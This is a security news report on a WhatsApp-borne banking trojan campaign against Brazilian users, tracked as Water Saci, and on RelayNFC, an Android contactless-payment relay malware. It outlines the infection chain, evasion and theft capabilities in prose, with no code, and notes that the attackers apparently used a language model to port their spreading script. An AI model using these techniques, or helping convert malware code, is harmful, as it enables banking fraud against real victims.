Brazilian users have been targeted by a multi-stage campaign that uses WhatsApp messages and attachments to deliver a banking trojan, Trend Micro researchers said. The operator tracked as Water Saci has shifted from PowerShell to a Python-based propagation script and now employs HTML Application (HTA) files and PDFs in a layered infection chain that researchers say increases delivery speed and resilience.
In the observed attacks, victims receive messages from trusted contacts on WhatsApp that include malicious PDFs or HTA attachments. The PDF lures instruct recipients to “update” Adobe Reader via an embedded link, while opening HTA files runs a Visual Basic Script that executes PowerShell commands to fetch next-stage payloads from remote servers, including an MSI installer and a Python script used to spread the malware through WhatsApp Web sessions.
The MSI installer acts as a delivery mechanism that launches an AutoIt script to install the banking trojan and enforce single-instance execution by checking for a marker file named “executed.dat” and notifying an attacker-controlled server identified in the research. AutoIt artifacts also check whether the Windows system language is Portuguese (Brazil) before scanning for banking-related folders and artifacts tied to major Brazilian financial apps.
Researchers reported additional reconnaissance that includes scanning Google Chrome browsing history for visits to a hard-coded list of banks and using Windows Management Instrumentation (WMI) queries to collect host information. The delivery chain can decrypt and inject intermediate loader files into a hollowed svchost.exe process or, if alternate artifacts are present, load the banking trojan directly into process memory.
The deployed trojan monitors active window titles for banking, payment or cryptocurrency platforms, can terminate browsers to force victims to reopen sites under attacker conditions, and supports capabilities such as credential overlays, keyboard capture, screen capture, mouse simulation and file transfer. The malware establishes persistence through Registry modifications, uses anti-virtualization checks, and communicates with command-and-control infrastructure identified by researchers.
Trend Micro noted the propagation script was ported from PowerShell to Python and said there is compelling evidence the actors may have used a large language model or code-translation tool to assist the conversion, pointing to functional similarities and console output artifacts. The research warned this approach helps the operator automate and maintain WhatsApp-based propagation at scale.
Separately, Brazilian banking users are also being targeted by a previously undocumented Android malware family dubbed RelayNFC that implements a real-time APDU relay channel to enable contactless payment fraud, Cyble said. RelayNFC, built with React Native and Hermes bytecode and spread via phishing to decoy Portuguese-language sites, collects card data and PINs and relays APDU commands to complete transactions remotely; researchers also found an experimental APK related to Host Card Emulation.